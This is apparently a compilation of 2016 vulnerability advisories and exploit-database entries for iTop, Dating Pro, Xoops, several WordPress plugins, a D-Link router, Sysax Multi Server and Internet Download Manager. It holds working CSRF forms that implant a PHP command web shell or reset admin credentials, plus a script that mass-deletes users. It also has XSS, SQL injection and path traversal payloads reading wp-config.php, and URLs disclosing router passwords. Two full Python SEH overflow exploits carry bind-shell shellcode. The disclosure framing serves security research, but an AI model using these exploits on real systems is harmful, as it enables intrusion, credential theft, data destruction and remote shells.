The XSS is activated when admins open the dashboard (the code gets loaded from /actions-log.php via ajax) or when he accesses the "Recent activities log"
actions-log.php html output:
<td class="footable-visible">"<script>alert('XSS')</script></td>
1.3 As admin in "Groups" -> "Add new"
The fields "Name" and "Description" are injectible. The XSS is activated on the "Manage groups" page.
Simple vector: "><script>alert('XSS')</script>
Timeline
========================================================================
2016/02/19 - Issues discovered
2016/02/22 - Developed fixes for these and multiple other vulnerabilities.
Informed project maintainers
2016/03/04 - Fixes merged into master branch by project maintainers
Solution
========================================================================
Update to current version from GitHub. See https://github.com/ignacionelson/ProjectSend/issues/80 for discussion.
Advisory ID: HTB23293
Product: iTop
Vendor: Combodo
Vulnerable Version(s): 2.2.1 and probably prior
Tested Version: 2.2.1
Advisory Publication: February 10, 2016 [without technical details]
Vendor Notification: February 10, 2016
Vendor Patch: February 11, 2016
Public Disclosure: March 18, 2016
Vulnerability Type: Cross-Site Request Forgery [CWE-352]
Risk Level: High
CVSSv3 Base Score: 7.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered a Remote Code Execution vulnerability in iTop that is exploitable via Cross-Site Request Forgery flaw that is also present in the application. The vulnerability exists due to absence of validation of HTTP request origin in "/env-production/itop-config/config.php" script, as well as lack of user-input sanitization received via "new_config" HTTP POST parameter.
A remote unauthenticated attacker can perform CSRF attack and execute arbitrary PHP code on the vulnerable system with privileges of the web server. Successful exploitation of the vulnerability may allow an attacker to execute arbitrary system commands on the web server, gain complete access to vulnerable web application and its databases that may contain very sensitive information.
The attacker shall create a malicious web page with CSRF exploit code, trick a logged-in administrator to visit the page, spoof the HTTP request as if it was coming from the legitimate user, and permanently inject malicious PHP code into iTop configuration file.
CSRF exploit will inject the following PHP code into iTop configuration file:
<? if(isset($_GET['cmd'])) die(passthru($_GET['cmd'])); ?>
To reproduce the vulnerability, just create an empty HTML file and paste the following CSRF exploit code into it:
<form action="http://[host]/env-production/itop-config/config.php?c%5Bmenu%5D=ConfigEditor" method="post" name="main">
<input type="hidden" name="operation" value="save">
<input type="hidden" name="prev_config" value="1">
<input type="hidden" name="new_config" value="<? if(isset($_GET['cmd'])) die(passthru($_GET['cmd'])); ?>">
<input value="submit" id="btn" type="submit" />
</form>
Then login to iTop website with admin account and open the file in your browser.
After successful exploitation an attacker can run arbitrary system commands using the "/pages/UI.php" script. This simple PoC will execute "/bin/ls" directory listing command:
http://[host]/pages/UI.php?cmd=ls
-----------------------------------------------------------------------------------------------
Solution:
Replace the file datamodels/2.x/itop-config/config.php by the version from the appropriate revision from SVN, then run the setup again.
More Information:
https://sourceforge.net/p/itop/tickets/1202/
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23293 - https://www.htbridge.com/advisory/HTB23293 - RCE via CSRF in iTop
[2] iTop - http://www.combodo.com - iTop: open source ITIL ITSM Software.
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[4] ImmuniWeb® - https://www.htbridge.com/immuniweb/ - web security platform by High-Tech Bridge for on-demand and continuous web application security, vulnerability management, monitoring and PCI DSS compliance.
[5] Free SSL/TLS Server test - https://www.htbridge.com/ssl/ - check your SSL implementation for PCI DSS and NIST compliance. Supports all types of protocols.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
Advisory ID: HTB23294
Product: Dating Pro
Vendor: DatingPro
Vulnerable Version(s): Genie (2015.7) and probably prior
Tested Version: Genie (2015.7)
Advisory Publication: February 10, 2016 [without technical details]
Vendor Notification: February 10, 2016
Vendor Patch: February 29, 2016
Public Disclosure: March 18, 2016
Vulnerability Type: Cross-Site Request Forgery [CWE-352]
Risk Level: Critical
CVSSv3 Base Scores: 8.8 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H], 9.6 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered multiple Cross-Site Request Forgery (CSRF) vulnerabilities in a popular dating social network Dating Pro.
A remote unauthenticated attacker can perform CSRF attacks to change administrator’s credentials and execute arbitrary system commands. Successful exploitation of the vulnerability may allow attacker to gain complete control over the vulnerable website, all its users and databases.
1) CSRF in "/admin/ausers/index"
The vulnerability exists due to the absence of validation of HTTP request origin in "/admin/ausers/index" script. A remote unauthenticated attacker can create a specially crafted malicious web page with CSRF exploit, trick a logged-in administrator to visit the page, spoof the HTTP request as if it was coming from the legitimate user, and change login, email address and password of the current website administrator. This means a total takeover of the website.
A simple CSRF exploit below will change login, email and password to "admin", "admin@mail.com" and "123456" respectively.
To reproduce the vulnerability, just create an empty HTML file, paste the CSRF exploit code into it, login to iTop website and open the file in your browser:
<form action="http://[host]/admin/ausers/index" method="post" name="main">
<input type="hidden" name="nickname" value="admin">
<input type="hidden" name="email" value="admin@mail.com">
<input type="hidden" name="update_password" value="1">
<input type="hidden" name="password" value="123456">
<input type="hidden" name="repassword" value="123456">
<input type="hidden" name="name" value="admin">
<input type="hidden" name="description" value="">
<input type="hidden" name="btn_save" value="Save">
<input value="submit" id="btn" type="submit" />
</form><script>document.main.submit();</script>
Now you can login as administrator using the above-mentioned credentials.
2) CSRF in /admin/notifications/settings/
The vulnerability exists due to absence of validation of HTTP request origin in "/admin/notifications/settings/" script. A remote unauthenticated attacker can create a specially crafted malicious web page with CSRF exploit, trick a logged-in administrator to visit the page, spoof the HTTP request as if it was coming from the legitimate user, and execute arbitrary system commands with privileges of the web server.
A simple exploit below will replace full path to sendmail program with the following "cp config.php config.txt" system command that will copy "config.php" file into "config.txt" making its content publicly accessible:
<form action="http://[host]/admin/notifications/settings/" method="post" name="main">
<input type="hidden" name="mail_charset" value="utf-8">
<input type="hidden" name="mail_protocol" value="sendmail">
<input type="hidden" name="mail_useragent" value="pg-mailer">
<input type="hidden" name="mail_from_email" value="admin@site.com">
<input type="hidden" name="mail_from_name" value="PgSoftware">
<input type="hidden" name="" value="">
<input type="hidden" name="btn_save" value="Save">
<input type="hidden" name="mail_mailpath" value="cp config.php config.txt ||">
</form><script>document.main.submit();</script>
The command will be executed the next time when any email is being sent by the vulnerable web application.
It is also possible to trigger this event using the following following CSRF exploit:
<form action="http://[host]/admin/notifications/settings/" method="post" name="main">
<input type="hidden" name="mail_to_email" value="mail@mail.com">
<input type="hidden" name="btn_test" value="Send">
</form><script>document.main.submit();</script>
-----------------------------------------------------------------------------------------------
Solution:
Update to Genie (2015.7) released after February 29, 2016.
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23294 - https://www.htbridge.com/advisory/HTB23294 - Admin Password Reset & RCE via CSRF in Dating Pro
[2] Dating Pro - http://www.datingpro.com - Everything you need to start and run a dating business.
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[4] ImmuniWeb® - https://www.htbridge.com/immuniweb/ - web security platform by High-Tech Bridge for on-demand and continuous web application security, vulnerability management, monitoring and PCI DSS compliance.
[5] Free SSL/TLS Server test - https://www.htbridge.com/ssl/ - check your SSL implementation for PCI DSS and NIST compliance. Supports all types of protocols.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
# Exploit Title: Wordpress image-export LFD
# Date: 03/21/2016
# Exploit Author: AMAR^SHG
# Vendor Homepage: http://www.1efthander.com
# Software Link:
http://www.1efthander.com/category/wordpress-plugins/image-export
# Version: Everything is affected including latest (1.1.0 )
# Tested on: Windows/Unix on localhost
download.php file code:
<?php
if ( isset( $_REQUEST['file'] ) && !empty( $_REQUEST['file'] ) ) {
$file = $_GET['file'];
header( 'Content-Type: application/zip' );
header( 'Content-Disposition: attachment; filename="' . $file . '"' );
readfile( $file );
unlink( $file );
exit;
}
?>
Proof of concept:
Note that because of the unlink, we potentially can destroy the wordpress core.
Simply add the get parameter file:
localhost/wp/wp-content/plugins/image-export/download.php?file=../../../wp-config.php
Found by AMAR^SHG (Shkupi Hackers Group)
# Exploit Title: Sysax Multi Server 6.50 HTTP File Share SEH Overflow RCE Exploit
# Date: 03/21/2016
# Exploit Author: Paul Purcell
# Contact: ptpxploit at gmail
# Vendor Homepage: http://www.sysax.com/
# Vulnerable Version Download: http://download.cnet.com/Sysax-Multi-Server/3000-2160_4-76171493.html (6.50 as of posting date)
# Version: Sysax Multi Server 6.50
# Tested on: Windows XP SP3 English
# Category: Remote Code Execution
#
# Timeline: 03/11/16 Bug found
# 03/14/16 Vender notified
# 03/17/16 Vender acknowledges issue and publishes patch (6.51)
# 03/21/16 Exploit Published
#
# Summary: This is a post authentication exploit that requires the HTTP file sharing service to be running on
# Sysas Multi Server 6.50. The SID can be retrieved from your browser's URL bar after logging into the
# service. Once exploited, the shellcode runs with SYSTEM privileges. In this example, we attack folder_
# in dltslctd_name1.htm. The root path of the user shouldn't break the buffer offset in the stack, though
# the user will need to have permission to delete folders. If the user has file delete permissions, file_
# will work as well. mk_folder1_name1 is also vulnerable with a modified buffer, so this same exploit can
# be modified to adapt to a users permissions.
import httplib
target = 'webbackup'
port = 80
sid = '57e546cb7204b60f0111523409e49bdb16692ab5' #retrieved from browser URL after login
#example: http://hostname/scgi?sid=57e546cb7204b60f0111523409e49bdb16692ab5&pid=dltslctd_name1.htm
#msfvenom -p windows/shell_bind_tcp LPORT=4444 --platform windows -a x86 -f c -b "\x00\x0a"
shell=("\x6a\x52\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd7\xae"
"\x73\xe9\x83\xeb\xfc\xe2\xf4\x2b\x46\xf1\xe9\xd7\xae\x13\x60"
"\x32\x9f\xb3\x8d\x5c\xfe\x43\x62\x85\xa2\xf8\xbb\xc3\x25\x01"
"\xc1\xd8\x19\x39\xcf\xe6\x51\xdf\xd5\xb6\xd2\x71\xc5\xf7\x6f"
"\xbc\xe4\xd6\x69\x91\x1b\x85\xf9\xf8\xbb\xc7\x25\x39\xd5\x5c"
"\xe2\x62\x91\x34\xe6\x72\x38\x86\x25\x2a\xc9\xd6\x7d\xf8\xa0"
"\xcf\x4d\x49\xa0\x5c\x9a\xf8\xe8\x01\x9f\x8c\x45\x16\x61\x7e"
"\xe8\x10\x96\x93\x9c\x21\xad\x0e\x11\xec\xd3\x57\x9c\x33\xf6"
"\xf8\xb1\xf3\xaf\xa0\x8f\x5c\xa2\x38\x62\x8f\xb2\x72\x3a\x5c"
"\xaa\xf8\xe8\x07\x27\x37\xcd\xf3\xf5\x28\x88\x8e\xf4\x22\x16"
"\x37\xf1\x2c\xb3\x5c\xbc\x98\x64\x8a\xc6\x40\xdb\xd7\xae\x1b"
"\x9e\xa4\x9c\x2c\xbd\xbf\xe2\x04\xcf\xd0\x51\xa6\x51\x47\xaf"
"\x73\xe9\xfe\x6a\x27\xb9\xbf\x87\xf3\x82\xd7\x51\xa6\x83\xdf"
"\xf7\x23\x0b\x2a\xee\x23\xa9\x87\xc6\x99\xe6\x08\x4e\x8c\x3c"
"\x40\xc6\x71\xe9\xc6\xf2\xfa\x0f\xbd\xbe\x25\xbe\xbf\x6c\xa8"
"\xde\xb0\x51\xa6\xbe\xbf\x19\x9a\xd1\x28\x51\xa6\xbe\xbf\xda"
"\x9f\xd2\x36\x51\xa6\xbe\x40\xc6\x06\x87\x9a\xcf\x8c\x3c\xbf"
"\xcd\x1e\x8d\xd7\x27\x90\xbe\x80\xf9\x42\x1f\xbd\xbc\x2a\xbf"
"\x35\x53\x15\x2e\x93\x8a\x4f\xe8\xd6\x23\x37\xcd\xc7\x68\x73"
"\xad\x83\xfe\x25\xbf\x81\xe8\x25\xa7\x81\xf8\x20\xbf\xbf\xd7"
"\xbf\xd6\x51\x51\xa6\x60\x37\xe0\x25\xaf\x28\x9e\x1b\xe1\x50"
"\xb3\x13\x16\x02\x15\x83\x5c\x75\xf8\x1b\x4f\x42\x13\xee\x16"
"\x02\x92\x75\x95\xdd\x2e\x88\x09\xa2\xab\xc8\xae\xc4\xdc\x1c"
"\x83\xd7\xfd\x8c\x3c")
arg="folder_" #can also be changed to file_ if user has file delete permissions
pid="dltslctd_name1" #Can be changed, though padding will needed to be updated as well
junk1="A"*26400 #Initial pile of junk
noppad="\x90"*296 #Place to land from our long jump and before our shellcode
junkfill="\x90"*(768-len(shell)) #Fill in after our shellcode till nseh
nseh="\xeb\x06\x90\x90" #Short jump over SEH
seh="\xd7\x2a\x92\x5d" #pop esi # pop edi # ret RPCNS4.dll
jump="\xe9\x13\xfc\xff\xff" #jump back 1000 bytes for plenty of room for your shellcode
junk2="D"*9500 #Junk at the end
buff=(arg+junk1+noppad+shell+junkfill+nseh+seh+jump+junk2)
head = "Host: Wee! \r\n"
head += "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0\r\n"
head += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
head += "Accept-Language: en-us,en;q=0.5\r\n"
head += "Accept-Encoding: gzip, deflate\r\n"
head += "Referer: http://gotcha/scgi?sid="+sid+"&pid="+pid+".htm\r\n"
head += "Proxy-Connection: keep-alive\r\n"
head += "Content-Type: multipart/form-data; boundary=---------------------------20908311357425\r\n"
head += "Content-Length: 1337\r\n"
head += "If-Modified-Since: *\r\n"
head += "\r\n"
head += "-----------------------------217830224120\r\n"
head += "\r\n"
head += "\r\n"
head += "\r\n"
head += buff
conn = httplib.HTTPConnection(target,port)
conn.request("POST", "/scgi?sid="+sid+"&pid="+pid+".htm", head)
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/XOOPS-DIRECTORY-TRAVERSAL.txt
Vendor:
=============
xoops.org
Product:
================
Xoops 2.5.7.2
Vulnerability Type:
===========================
Directory Traversal Bypass
Vulnerability Details:
=====================
Xoops 2.5.7.2 has checks to defend against directory traversal attacks.
However, they can be easily bypassed by simply issuing "..././" instead of
"../"
References:
http://xoops.org/modules/news/article.php?storyid=6757
Exploit Codes:
==============
In Xoops code in 'protector.php' the following check is made for dot dot
slash "../" in HTTP requests
/////////////////////////////////////////////////////////////////////////////////
if( is_array( $_GET[ $key ] ) ) continue ;
if ( substr( trim( $val ) , 0 , 3 ) == '../' || strstr( $val , '../../' ) )
{
$this->last_error_type = 'DirTraversal' ;
$this->message .= "Directory Traversal '$val' found.\n" ;
////////////////////////////////////////////////////////////////////////////////
The above Xoops directory traversal check can be defeated by using
..././..././..././..././
you can test the theory by using example below test case by supplying
..././ to GET param.
$val=$_GET['c'];
if ( substr( trim( $val ) , 0 , 3 ) == '../' || strstr( $val , '../../' ) )
{
echo "traversal!";
}else{
echo "ok!" . $val;
}
Disclosure Date:
==================================
Feb 2, 2016: Vendor Notification
Vendor confirms and patches Xoops
March 17, 2016 : Public Disclosure
==================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere. (c) hyp3rlinx.
<!--
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/XOOPS-CSRF.txt
Vendor:
=============
xoops.org
Product:
================
Xoops 2.5.7.2
Vulnerability Type:
===================================
CSRF - Arbitrary User Deletions
Vulnerability Details:
=====================
Xoops 2.5.7.2 has CSRF vulnerability where remote attackers can delete ALL
users from the Xoops database.
References:
http://xoops.org/modules/news/article.php?storyid=6757
Exploit Codes:
=============
Following CSRF attack delete all users from database, following POC code
will sequentially delete 100 users from the Xoops application.
-->
<iframe name="ifrm" style="display:none" name="hidden-form"></iframe>
<form target="ifrm" name='memberslist' id='CSRF' action='
http://localhost/xoops-2.5.7.2/htdocs/modules/system/admin.php?fct=users'
method='POST'>
<input type="hidden" id="ids" name="memberslist_id[]" />
<input type="hidden" name="fct" value="users" />
<input type="hidden" name="edit_group" value="" />
<input type="hidden" name="selgroups" value="" />
<input type="hidden" name="op" value="users_add_delete_group" />
<input type="hidden" name="op" value="action_group" />
<input type="hidden" name="Submit" value="Submit+Query" />
</form>
<script>
var c=-1
var amttodelete=100
var id=document.getElementById("ids")
var frm=document.getElementById("CSRF")
function doit(){
c++
arguments[1].value=c
arguments[0].submit()
if(c>=amttodelete){
clearInterval(si)
alert("Done!")
}
}
var si=setInterval(doit, 1000, frm, id)
</script>
<!--
Disclosure Date:
==================================
Jan 29, 2016: Vendor Notification
Vendor confirms and patches Xoops
March 17, 2016 : Public Disclosure
=================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere. (c) hyp3rlinx.
-->
D-Link DWR-932 Firmware <= V4.00 Authentication Bypass - Password Disclosure
Author: Saeed reza Zamanian [penetrationtest @ Linkedin]
Product: D-Link DWR-932
Tested Version: Firmware V4.00(EU)b03
Vendor: D-Link http://www.dlink.com/
Product URL: http://www.dlink.com/uk/en/home-solutions/work/personal-hotspots/dwr-932-4g-lte-mobile-wi-fi-hotspot-150-mbps
Date: 20 Mar 2016
About Product:
---------------
The DWR-932 4G LTE Mobile Wi-Fi Hotspot 150 Mbps is a 4G/LTE Cat4 high speed broadband Wi-Fi mobile hotspot. The DWR-932 uses a 4G Internet connection to give you a simple and fast Wi-Fi network anywhere you need.
Vulnerability Details:
----------------------
The Cgi Script "/cgi-bin/dget.cgi" handles most of user side and server side requests, but there is no observation on requests recieved from unauthorized users.
so the attacker will be able to view Adminitrative or Wifi Password in clear text by visiting below URLs.
View Admin Username and Password:
http://192.168.0.1/cgi-bin/dget.cgi?cmd=DEVICE_web_usrname,DEVICE_web_passwd,DEVICE_login_timeout&_=1458459188807
Output:
{ "DEVICE_web_usrname": "MyUsErNaMe", "DEVICE_web_passwd": "MyPaSsWoRd", "DEVICE_login_timeout": "600" }
View Wifi Password:
http://192.168.0.1/cgi-bin/dget.cgi?cmd=wifi_AP1_ssid,wifi_AP1_hidden,wifi_AP1_passphrase,wifi_AP1_passphrase_wep,wifi_AP1_security_mode,wifi_AP1_enable,get_mac_filter_list,get_mac_filter_switch,get_client_list,get_mac_address,get_wps_dev_pin,get_wps_mode,get_wps_enable,get_wps_current_time&_=1458458152703
Output:
{ "wifi_AP1_ssid": "dlink-DWR-932", "wifi_AP1_hidden": "0", "wifi_AP1_passphrase": "MyPaSsPhRaSe", "wifi_AP1_passphrase_wep": "", "wifi_AP1_security_mode": "3208,8", "wifi_AP1_enable": "1", "get_mac_filter_list": "", "get_mac_filter_switch": "0", "get_client_list": "9c:00:97:00:a3:b3,192.168.0.45,IT-PCs,0>40:b8:00:ab:b8:8c,192.168.0.43,android-b2e363e04fb0680d,0", "get_mac_address": "c4:00:f5:00:ec:40", "get_wps_dev_pin": "", "get_wps_mode": "0", "get_wps_enable": "0", "get_wps_current_time": "" }
Export All Configurations:
http://192.168.0.1/cgi-bin/export_cfg.cgi
#EOF
Exploit Title: DORG - Disc Organization System SQL Injection And Cross Site Scripting
Software Link: http://www.opensourcecms.com/scripts/details.php?scriptid=479
Author: SECUPENT
Website:www.secupent.com
Email: research{at}secupent{dot}com
Date: 20-3-2016
SQL Injection:
link: http://localhost/dorg/results.php?q=3&search=%2527&type=3
Screenshot: http://secupent.com/exploit/images/drogsql.jpg
Cross Site Scripting (XSS):
link: http://localhost/dorg/results.php?q=%27%22--%3E%3C%2fstyle%3E%3C%2fscRipt%3E%3CscRipt%3Ealert%280x00194A%29%3C%2fscRipt%3E&search=Search&type=3
Screenshot: http://secupent.com/exploit/images/drogxss.jpg
#!/usr/bin/python
# Exploit Title: Internet Download Manager 6.25 Build 14 - 'Find file' SEH Buffer Overflow (Unicode)
# Date: 20-3-2016
# Exploit Author: Rakan Alotaibi
# Contact: https://twitter.com/hxteam
# Software Link: http://mirror2.internetdownloadmanager.com/idman625build14.exe
# Tested on: Windows 7 SP1 x86
# How to exploit: IDM > Downloads > Find > paste exploit string into 'Find file' textbox
tag = "AvAv"
# msfvenom -p windows/shell_bind_tcp lport=4444 -e x86/unicode_upper BufferRegister=EAX
shellcode = (
"PPYAIAIAIAIAQATAXAZAPU3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ"
"11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944J"
"BKL9XU2M0KPM0QP3YZENQ7PQTTKR0NPDKR2LLDKQBN44KSBMXLO7GOZO601KO6LO"
"LS1SLM2NLMP7Q8OLMKQY7IRZR1BQG4K22N04K0JOLDK0LN1SHJC0HM18Q0Q4K0YO"
"0KQ9CTKOYLX9SNZQ94KNTDKKQ8V01KOVLGQ8OLMKQY708K0D5KFLC3MKHOKCMNDD"
"5ZD0X4KB8O4M1IC2F4KLL0KTKPXMLKQICDKKTDKKQJ0SY0DO4NDQK1KS1QIPZ21K"
"OK01O1O1JDKMBZKTM1M2HP3OBKPKP1XT7SCNR1OB42H0LCGO6LGKOIEH860M1M0K"
"PMYXD1DPPQXMY3PBKKPKOHU2JKXR9R0IRKMQ0R0Q00PQXJJLO9OIPKOIE4WQXM2K"
"PN11L4IYVQZLPQFPWS8XBIKNW1WKOHU0WRHWG9YOHKOKO8U27BHD4ZLOKYQKOYE0"
"W671X2UBNPMS1KOYEBH2C2MRDM0TIIS27QG0WP1ZVBJLR29PVK2KM3697PDNDOLK"
"QM1TM14NDLPWVKP14QD0PQF26PVOV26PNQFR6QC26QXBYXLOO3VKO9E3YK00NB6O"
"VKOP0QXKX57MMC0KOZ5WKL0FUFBB6QX5V5E7MEMKOXUOLKV3LKZ3PKKIP45M57KP"
"GMCCB2OBJKPQCKO9EAA")
# Windows NtAccessCheckAndAuditAlarm EggHunter
# Size: 32 bytes
egghunter = (
"PPYAIAIAIAIAQATA"
"XAZAPA3QADAZABAR"
"ALAYAIAQAIAQAPA5"
"AAAPAZ1AI1AIAIAJ"
"11AIAIAXA58AAPAZ"
"ABABQI1AIQIAIQI1"
"111AIAJQI1AYAZBA"
"BABABAB30APB944J"
"BQV51HJKOLOPBR2Q"
"ZKRPXXMNNOLKUPZ2"
"TJOWHKPOQKPT6DKJ"
"ZVOT5ZJVOBUK7KOK"
"7LJA")
buffersize = 6000
nseh = "\x61\x47" # popad + venetian pad
seh = "\x8d\x51" # 0x0051008d: pop edi # pop esi # ret [IDMan.exe]
venalign = (
"\x47" # venetian pad
"\x55" # push ebp
"\x47" # venetian pad
"\x58" # pop eax
"\x47" # venetian pad
"\x05\x18\x11" # add eax,11001800
"\x47" # venetian pad
"\x2d\x17\x11" # sub eax,11001700
"\x47" # venetian pad
"\x50" # push eax
"\x47" # venetian pad
"\xc3" # ret
)
venalign2 = (
"\x43" # venetian pad
"\x47" # inc edi
"\x43" # venetian pad
"\x57" # push edi
"\x43" # venetian pad
"\x58" # pop eax
"\x43" # venetian pad
"\x05\x18\x11" # add eax,11001800
"\x43" # venetian pad
"\x2d\x17\x11" # sub eax,11001700
"\x43" # venetian pad
"\x50" # push eax
"\x43" # venetian pad
"\xc3" # ret
)
junk2 = "\x71" * 108
junk3 = "\x71" * 110
evil2 = tag + venalign2 + junk3 + shellcode
junk = "\x42" * (2192-(len(evil2)))
evil = junk + evil2 + nseh + seh + venalign + junk2 + egghunter
fill = "\x47" * (buffersize-len(evil))
buffer = evil + fill
filename = "exploit.txt"
file = open(filename, 'w')
file.write(buffer)
file.close()
print buffer
print "[+] File created successfully"
# Exploit Title: Wordpress Plugin Abtest - Local File Inclusion
# Date: 2016-03-19
# Google Dork : inurl:/wp-content/plugins/abtest/
# Exploit Author: CrashBandicot
# Vendor Homepage: https://github.com/wp-plugins/abtest
# Tested on: Chrome
# Vulnerable File : abtest_admin.php
<?php
require 'admin/functions.php';
if (isset($_GET['action'])) {
include 'admin/' . $_GET['action'] . '.php';
} else {
include 'admin/list_experiments.php';
}
?>
# PoC : localhost/wp-content/plugins/abtest/abtest_admin.php?action=[LFI]
# Pics : http://i.imgur.com/jZFKYOc.png
# Exploit Title: Wordpress eBook Download 1.1 | Directory Traversal
# Exploit Author: Wadeek
# Website Author: https://github.com/Wad-Deek
# Software Link: https://downloads.wordpress.org/plugin/ebook-download.zip
# Version: 1.1
# Tested on: Xampp on Windows7
[Version Disclosure]
======================================
http://localhost/wordpress/wp-content/plugins/ebook-download/readme.txt
======================================
[PoC]
======================================
/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
======================================